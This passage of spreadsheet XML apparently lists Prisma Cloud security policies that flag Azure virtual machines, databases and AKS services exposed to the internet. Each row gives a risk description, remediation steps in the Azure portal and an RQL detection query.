          <t>This policy identifies Azure Virtual Machines with network path from the internet (0.0.0.0/0) on Admin ports.
Azure Virtual Machines with network path from the internet increases the risk of unauthorized access, cyber attacks, and data breaches, as it may provide a larger attack surface for malicious actors. Such instances are especially prone to brute force or vulnerability exploits. Admin ports can increase opportunities for malicious activities such as hacking, Man-In-The-Middle attacks (MITM), and brute-force attacks
As a best practice, restrict traffic from unknown IP addresses and limit the access from known hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3464" t="inlineStr">
        <is>
          <t>Restrict network path from the internet to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t>
        </is>
      </c>
      <c r="Y3464" t="inlineStr"/>
      <c r="Z3464" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match'  and dest.resource.type = 'Instance' and dest.cloud.type = 'Azure' and protocol.ports in ('tcp/22', 'tcp/3389')and dest.resource.state = 'Active'</t>
        </is>
      </c>
      <c r="AA3464" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3464" t="inlineStr">
        <is>
          <t>2024-08-19 06:32:45</t>
        </is>
      </c>
      <c r="AC3464" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1017</t>
        </is>
      </c>
      <c r="AD3464" t="b">
        <v>1</v>
      </c>
      <c r="AE3464" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3464" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG346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4" t="inlineStr">
        <is>
          <t>45a983c8-0527-4a6d-a62b-c6e2bf48590f</t>
        </is>
      </c>
      <c r="AI3464" t="inlineStr">
        <is>
          <t>0294a7d4-3302-459c-b06c-1be4837079a1</t>
        </is>
      </c>
      <c r="AJ3464" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3464" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3465">
      <c r="A3465" t="inlineStr"/>
      <c r="B3465" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3465" s="2" t="inlineStr"/>
      <c r="D3465" t="inlineStr"/>
      <c r="E3465" t="inlineStr"/>
      <c r="F3465" t="inlineStr"/>
      <c r="G3465" t="b">
        <v>1</v>
      </c>
      <c r="H346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65" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3465" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3465" t="inlineStr">
        <is>
          <t>Azure Virtual Machine with network path from the internet (0.0.0.0/0) on ports 80/443</t>
        </is>
      </c>
      <c r="L3465" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3465" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3465" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3465" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3465" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3465" t="inlineStr"/>
      <c r="R3465" t="inlineStr"/>
      <c r="S3465" t="inlineStr">
        <is>
          <t>Attack Path Rule,network_config</t>
        </is>
      </c>
      <c r="T3465" t="b">
        <v>0</v>
      </c>
      <c r="U3465" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3465" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3465" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines with network path from the internet (0.0.0.0/0) on ports 80/443.
Azure Virtual Machines with network path from the internet increases the risk of unauthorized access, cyber attacks, and data breaches, as it may provide a larger attack surface for malicious actors. Such instances are especially prone to brute force or vulnerability exploits. Port 80 and 443 are frequently targeted ports and utilized for HTTP and HTTPS protocols, making them susceptible to attacks like cross-site scripting, SQL injections, cross-site request forgeries, and DDoS attacks.
As a best practice, restrict traffic from unknown IP addresses and limit the access from known hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3465" t="inlineStr">
        <is>
          <t>Restrict network path from the internet to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t>
        </is>
      </c>
      <c r="Y3465" t="inlineStr"/>
      <c r="Z3465" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'Instance' and dest.cloud.type = 'AZURE' and protocol.ports in ( 'tcp/80' , 'tcp/443' )</t>
        </is>
      </c>
      <c r="AA3465" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3465" t="inlineStr">
        <is>
          <t>2024-08-19 06:32:45</t>
        </is>
      </c>
      <c r="AC3465" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1077</t>
        </is>
      </c>
      <c r="AD3465" t="b">
        <v>1</v>
      </c>
      <c r="AE3465" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3465" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG346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5" t="inlineStr">
        <is>
          <t>2a8a75b5-750c-4f69-aeba-caee1e0fa44d</t>
        </is>
      </c>
      <c r="AI3465" t="inlineStr">
        <is>
          <t>adc43325-d0e7-4297-9e5f-b54186c1d39a</t>
        </is>
      </c>
      <c r="AJ3465" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3465" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3466">
      <c r="A3466" t="inlineStr"/>
      <c r="B3466" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3466" s="2" t="inlineStr"/>
      <c r="D3466" t="n">
        <v>4</v>
      </c>
      <c r="E3466" t="n">
        <v>3</v>
      </c>
      <c r="F3466" t="n">
        <v>0</v>
      </c>
      <c r="G3466" t="b">
        <v>1</v>
      </c>
      <c r="H346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66" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3466" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3466" t="inlineStr">
        <is>
          <t>Azure Cosmos DB (PaaS) instance with network path from the untrust internet source</t>
        </is>
      </c>
      <c r="L3466" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3466" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3466" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3466" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3466" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3466" t="inlineStr"/>
      <c r="R3466" t="inlineStr"/>
      <c r="S3466" t="inlineStr">
        <is>
          <t>Attack Path Rule,network_config</t>
        </is>
      </c>
      <c r="T3466" t="b">
        <v>0</v>
      </c>
      <c r="U3466" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3466" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3466" t="inlineStr">
        <is>
          <t>This policy identifies Azure Cosmos DB (PaaS) instances with network path from the untrust internet source.
Cosmos DB (PaaS) instances with network path from the untrust internet source may enable bad actors to use brute force or exploit a vulnerability on a system to gain unauthorized access. Further database vulnerabilities or weaknesses could potentially be exploited to compromise the integrity, availability, or confidentiality of the data stored.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66" t="inlineStr">
        <is>
          <t>Restrict access to Azure Cosmos DB instances from untrusted internet sources by configuring firewall rules.
1. Sign in to the Azure Portal using your Azure account credentials
2. Navigate to the Azure Cosmos DB Dashboard
3. Identify the reported Azure Cosmos DB instances that you want to restrict public access
4. Navigate to the 'Networking' section
5. Under 'Public network access' select 'Selected networks'
6. Under the 'Firewall' section, add the IP addresses or IP address ranges of the trusted sources in CIDR form in 'IP (Single IPv4 or CIDR range)'
7. Click 'Save' to apply the changes</t>
        </is>
      </c>
      <c r="Y3466" t="inlineStr"/>
      <c r="Z3466" t="inlineStr">
        <is>
          <t>config from network where source.network = UNTRUST_INTERNET and dest.resource.type = 'PaaS' and dest.cloud.type = 'AZURE' and dest.paas.service.type in ('MicrosoftDocumentDBDatabaseAccount')</t>
        </is>
      </c>
      <c r="AA3466" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3466" t="inlineStr">
        <is>
          <t>2024-08-19 06:32:45</t>
        </is>
      </c>
      <c r="AC3466" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-960</t>
        </is>
      </c>
      <c r="AD3466" t="b">
        <v>1</v>
      </c>
      <c r="AE3466" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3466" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG346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6" t="inlineStr">
        <is>
          <t>98076e12-0a77-404c-b743-f5cbc0fe00f5</t>
        </is>
      </c>
      <c r="AI3466" t="inlineStr">
        <is>
          <t>edcd4f47-4ec3-4140-9ed0-a2da04eeb848</t>
        </is>
      </c>
      <c r="AJ3466" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3466" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3467">
      <c r="A3467" t="inlineStr"/>
      <c r="B3467" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3467" s="2" t="inlineStr"/>
      <c r="D3467" t="inlineStr"/>
      <c r="E3467" t="inlineStr"/>
      <c r="F3467" t="inlineStr"/>
      <c r="G3467" t="b">
        <v>1</v>
      </c>
      <c r="H346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67" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3467" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3467" t="inlineStr">
        <is>
          <t>Azure PostgreSQL (PaaS) instance with network path from the untrust internet source on TCP port 5432</t>
        </is>
      </c>
      <c r="L3467" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3467" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3467" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3467" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3467" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3467" t="inlineStr"/>
      <c r="R3467" t="inlineStr"/>
      <c r="S3467" t="inlineStr">
        <is>
          <t>network_config,Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3467" t="b">
        <v>0</v>
      </c>
      <c r="U3467" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3467" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3467" t="inlineStr">
        <is>
          <t>This policy identifies Azure PostgreSQL (PaaS) instance with network path from the untrust internet source on TCP port 5432.
Azure PostgreSQL (PaaS) instance with network path from the untrust internet source on TCP port 5432 may enable bad actors to use brute force or exploit a vulnerability on a system to gain unauthorized access. Further database vulnerabilities or weaknesses could potentially be exploited to compromise the integrity, availability, or confidentiality of the data stored.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67" t="inlineStr">
        <is>
          <t>Restrict access to Azure PostgreSQL server instance from untrusted internet sources by configuring firewall rules
1. Sign in to the Azure Portal using your Azure account credentials
2. Navigate to the Azure PostgreSQL Server Dashboard
3. Identify the reported Azure PostgreSQL Server instance that you want to restrict from untrusted internet sources
4. Navigate to the 'Networking' section
6. Under the 'Firewall rules' section, add the IP addresses from Trusted IP Addresses
7. Click 'Save' to apply the changes</t>
        </is>
      </c>
      <c r="Y3467" t="inlineStr"/>
      <c r="Z3467" t="inlineStr">
        <is>
          <t>config from network where source.network = UNTRUST_INTERNET and dest.resource.type = 'PaaS' and dest.cloud.type = 'AZURE' and dest.paas.service.type in ( 'MicrosoftDBforPostgreSQLFlexibleServers', 'MicrosoftDBforPostgreSQLServers' ) and protocol.ports = 'tcp/5432'</t>
        </is>
      </c>
      <c r="AA3467" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3467" t="inlineStr">
        <is>
          <t>2024-08-19 06:32:45</t>
        </is>
      </c>
      <c r="AC3467" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-924</t>
        </is>
      </c>
      <c r="AD3467" t="b">
        <v>1</v>
      </c>
      <c r="AE3467" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3467" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG346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7" t="inlineStr">
        <is>
          <t>db13bedd-2e2d-4209-b889-3da7b254a2dd</t>
        </is>
      </c>
      <c r="AI3467" t="inlineStr">
        <is>
          <t>5d65da95-985d-449f-961b-535929bfea62</t>
        </is>
      </c>
      <c r="AJ3467" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3467" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3468">
      <c r="A3468" t="inlineStr"/>
      <c r="B3468" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3468" s="2" t="inlineStr"/>
      <c r="D3468" t="inlineStr"/>
      <c r="E3468" t="inlineStr"/>
      <c r="F3468" t="inlineStr"/>
      <c r="G3468" t="b">
        <v>1</v>
      </c>
      <c r="H346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68" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3468" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3468" t="inlineStr">
        <is>
          <t>Azure AKS K8s service with network path from the internet (0.0.0.0/0)</t>
        </is>
      </c>
      <c r="L3468" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3468" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3468" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3468" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3468" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3468" t="inlineStr"/>
      <c r="R3468" t="inlineStr"/>
      <c r="S3468" t="inlineStr">
        <is>
          <t>Attack Path Rule,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3468" t="b">
        <v>0</v>
      </c>
      <c r="U3468" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3468" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3468" t="inlineStr">
        <is>
          <t>This policy identifies Azure AKS K8s services with network path from the internet (0.0.0.0/0).
Container services exposed to the internet increases the risk of unauthorized access, cyber attacks, and data breaches, as they present a larger attack surface for malicious actors. These services are particularly vulnerable to brute force attacks and exploitation of known vulnerabilities.
As a best practice, restrict traffic from unknown IP addresses and limit access to trusted hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3468" t="inlineStr">
        <is>
          <t>The following steps are recommended to restrict AKS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network security group rules can be made more restrictive.
 b) Move the container/app service inside a restrictive subnet if it does not need to be publicly accessible.
 c) Remove or disassociate the public IP assigned to the respective K8s service.</t>
        </is>
      </c>
      <c r="Y3468" t="inlineStr"/>
      <c r="Z3468" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'K8s Service' and dest.cloud.type = 'AZURE' and effective.action = 'Allow'</t>
        </is>
      </c>
      <c r="AA3468" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3468" t="inlineStr">
        <is>
          <t>2024-10-14 06:35:06</t>
        </is>
      </c>
      <c r="AC3468" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1093</t>
        </is>
      </c>
      <c r="AD3468" t="b">
        <v>1</v>
      </c>
      <c r="AE3468" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3468" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG346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68" t="inlineStr">
        <is>
          <t>ef7d49a1-82d1-482a-bb89-ce19bab17c57</t>
        </is>
      </c>
      <c r="AI3468" t="inlineStr">
        <is>
          <t>bf5f9732-a239-4610-92e4-c3fa5b57821b</t>
        </is>
      </c>
      <c r="AJ3468" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3468" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3469">
      <c r="A3469" t="inlineStr"/>
      <c r="B3469" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3469" s="2" t="inlineStr"/>
      <c r="D3469" t="inlineStr"/>
      <c r="E3469" t="inlineStr"/>
      <c r="F3469" t="inlineStr"/>
      <c r="G3469" t="b">
        <v>1</v>
      </c>
      <c r="H3469"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69" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3469" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3469" t="inlineStr">
        <is>
          <t>Azure AKS K8s service with network path from the untrust internet source on ports with high risk</t>
        </is>
      </c>
      <c r="L3469" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3469" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3469" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3469" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3469" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3469" t="inlineStr"/>
      <c r="R3469" t="inlineStr"/>
      <c r="S3469" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3469" t="b">
        <v>0</v>
      </c>
      <c r="U3469" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3469" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3469" t="inlineStr">
        <is>
          <t>This policy identifies Azure AKS Kubernetes services with network paths from untrusted internet sources on ports with high risk.
Azure AKS Kubernetes services exposed to untrusted internet sources on ports with high-risk ports increase the risk of unauthorized access, cyber-attacks, and data breaches, as they may provide a larger attack surface for malicious actors. These container services are particularly vulnerable to brute-force attacks and exploits targeting known vulnerabilities.
As a best practice, it is recommended to allow access from the Trusted IP list and limit  access from known hosts, services, or specific entities.
NOTE: Prisma Cloud’s Trusted IP List feature allows administrators to specify a list of IP addresses that are considered trusted or safe.</t>
        </is>
      </c>
      <c r="X3469" t="inlineStr">
        <is>
          <t>The following steps are recommended to restrict container service from having unrestricted access from the Internet:
Visit the Network path Analysis from Source to Destination and review the network path components that allow internet access.
Identify the network component on which restrictive rules can be implemented.
Implement either of the following required changes and make sure no other resources have been impacted due to these changes:
 a) Create Kubernetes Network Policies to control traffic to and from your pods.
 b) Restrict inbound traffic to specific IP ranges for the Loadbalancer on container service.
 c) Move the container/app inside a restrictive subnet if it does not need to be publicly accessible.
 d) Remove or disassociate the public IP assigned to the respective container service.</t>
        </is>
      </c>
      <c r="Y3469" t="inlineStr"/>
      <c r="Z3469" t="inlineStr">
        <is>
          <t>config from network where source.network = UNTRUST_INTERNET and dest.resource.type = 'K8s Service' and dest.cloud.type = 'Azure' and protocol.ports in ( 'tcp/20:21', 'tcp/23', 'tcp/25', 'tcp/110', 'tcp/135', 'tcp/143', 'tcp/445', 'tcp/1433:1434', 'tcp/3000', 'tcp/3306', 'tcp/4333', 'tcp/5000', 'tcp/5432', 'tcp/5500', 'tcp/5601', 'tcp/8080', 'tcp/8088', 'tcp/8888', 'tcp/9200', 'tcp/9300' )</t>
        </is>
      </c>
      <c r="AA3469" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3469" t="inlineStr">
        <is>
          <t>2024-11-11 04:27:09</t>
        </is>
      </c>
      <c r="AC3469" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1304</t>
        </is>
      </c>
      <c r="AD3469" t="b">
        <v>1</v>
      </c>
      <c r="AE3469" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3469" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3469"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69" t="inlineStr">
        <is>
          <t>203b8af8-5f2e-4c83-85be-8715aa9cadad</t>
        </is>
      </c>
      <c r="AI3469" t="inlineStr">
        <is>
          <t>4fb67cd1-de2f-4df6-a3a4-9b6fa672c21e</t>
        </is>
      </c>
      <c r="AJ3469" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3469" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3470">
      <c r="A3470" t="inlineStr"/>
      <c r="B3470" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3470" s="2" t="inlineStr"/>
      <c r="D3470" t="n">
        <v>35</v>
      </c>
      <c r="E3470" t="n">
        <v>10</v>
      </c>
      <c r="F3470" t="n">
        <v>0</v>
      </c>
      <c r="G3470" t="b">
        <v>1</v>
      </c>
      <c r="H347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70" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3470" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3470" t="inlineStr">
        <is>
          <t>Azure Virtual Machine with network path from the internet (0.0.0.0/0)</t>
        </is>
      </c>
      <c r="L3470" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3470" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3470" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3470" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3470" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3470" t="inlineStr"/>
      <c r="R3470" t="inlineStr"/>
      <c r="S3470" t="inlineStr">
        <is>
          <t>Attack Path Rule,network_config,Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3470" t="b">
        <v>0</v>
      </c>
      <c r="U3470" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3470" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3470" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines with network path from the internet (0.0.0.0/0).
Azure Virtual Machines with network path from the internet increases the risk of unauthorized access, cyber attacks, and data breaches, as it may provide a larger attack surface for malicious actors. Such instances are especially prone to brute force or vulnerability exploits.
As a best practice, restrict traffic from unknown IP addresses and limit the access from known hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3470" t="inlineStr">
        <is>
          <t>Restrict network path from the internet to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select the rule that allow Internet access (0.0.0.0/0) to the trusted IP address.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t>
        </is>
      </c>
      <c r="Y3470" t="inlineStr"/>
      <c r="Z3470" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'Instance' and dest.cloud.type = 'AZURE' and dest.resource.state = 'Active'</t>
        </is>
      </c>
      <c r="AA3470" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3470" t="inlineStr">
        <is>
          <t>2024-08-19 06:32:45</t>
        </is>
      </c>
      <c r="AC3470" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-920</t>
        </is>
      </c>
      <c r="AD3470" t="b">
        <v>1</v>
      </c>
      <c r="AE3470" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3470" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG347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0" t="inlineStr">
        <is>
          <t>ee3cc82c-9d89-41e5-8daf-9a79d18c82eb</t>
        </is>
      </c>
      <c r="AI3470" t="inlineStr">
        <is>
          <t>1c8f24af-30b3-4bb7-8073-f41bbbb7214d</t>
        </is>
      </c>
      <c r="AJ3470" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3470" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3471">
      <c r="A3471" t="inlineStr"/>
      <c r="B3471" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3471" s="2" t="inlineStr"/>
      <c r="D3471" t="n">
        <v>0</v>
      </c>
      <c r="E3471" t="n">
        <v>1</v>
      </c>
      <c r="F3471" t="n">
        <v>0</v>
      </c>
      <c r="G3471" t="b">
        <v>1</v>
      </c>
      <c r="H347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71" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3471" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3471" t="inlineStr">
        <is>
          <t>Azure SQL Server (PaaS) with network path from the untrust internet source</t>
        </is>
      </c>
      <c r="L3471" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3471" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3471" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3471" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3471" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3471" t="inlineStr"/>
      <c r="R3471" t="inlineStr"/>
      <c r="S3471" t="inlineStr">
        <is>
          <t>Attack Path Rule,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3471" t="b">
        <v>0</v>
      </c>
      <c r="U3471" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3471" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3471" t="inlineStr">
        <is>
          <t>This policy identifies Azure SQL Server (PaaS) with network path from the untrust internet source.
Azure SQL Server (PaaS) with network path from the untrust internet source may enable bad actors to use brute force or exploit a vulnerability on a system to gain unauthorized access. Further database vulnerabilities or weaknesses could potentially be exploited to compromise the integrity, availability, or confidentiality of the data stored.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71" t="inlineStr">
        <is>
          <t>Restrict access to Azure SQL Server instance from untrusted internet sources by configuring firewall rules
1. Sign in to the Azure Portal using your Azure account credentials
2. Navigate to the Azure SQL Server Dashboard
3. Identify the reported Azure SQL Server that you want to restrict from untrusted internet sources
4. Navigate to the 'Networking' section
6. Under the 'Firewall rules' section, add the IP addresses from Trusted IP Addresses
7. Click 'Save' to apply the changes</t>
        </is>
      </c>
      <c r="Y3471" t="inlineStr"/>
      <c r="Z3471" t="inlineStr">
        <is>
          <t>config from network where source.network = UNTRUST_INTERNET and dest.resource.type = 'PaaS' and dest.cloud.type = 'AZURE' and dest.paas.service.type in ( 'MicrosoftSQLServers' )</t>
        </is>
      </c>
      <c r="AA3471" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3471" t="inlineStr">
        <is>
          <t>2024-08-19 06:32:45</t>
        </is>
      </c>
      <c r="AC3471" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1013</t>
        </is>
      </c>
      <c r="AD3471" t="b">
        <v>1</v>
      </c>
      <c r="AE3471" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3471" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG347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1" t="inlineStr">
        <is>
          <t>b94e4317-ebe3-4197-a44a-75a72bb4063d</t>
        </is>
      </c>
      <c r="AI3471" t="inlineStr">
        <is>
          <t>5414cf2f-6c0b-41d5-87d8-96ef9a8170ca</t>
        </is>
      </c>
      <c r="AJ3471" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3471" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3472">
      <c r="A3472" t="inlineStr"/>
      <c r="B3472" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3472" s="2" t="inlineStr"/>
      <c r="D3472" t="n">
        <v>2</v>
      </c>
      <c r="E3472" t="n">
        <v>6</v>
      </c>
      <c r="F3472" t="n">
        <v>0</v>
      </c>
      <c r="G3472" t="b">
        <v>1</v>
      </c>
      <c r="H347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72" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3472" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3472" t="inlineStr">
        <is>
          <t>Azure Virtual Machine with network path from the untrust internet source on ports with high risk</t>
        </is>
      </c>
      <c r="L3472" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3472" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3472" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3472" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3472" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
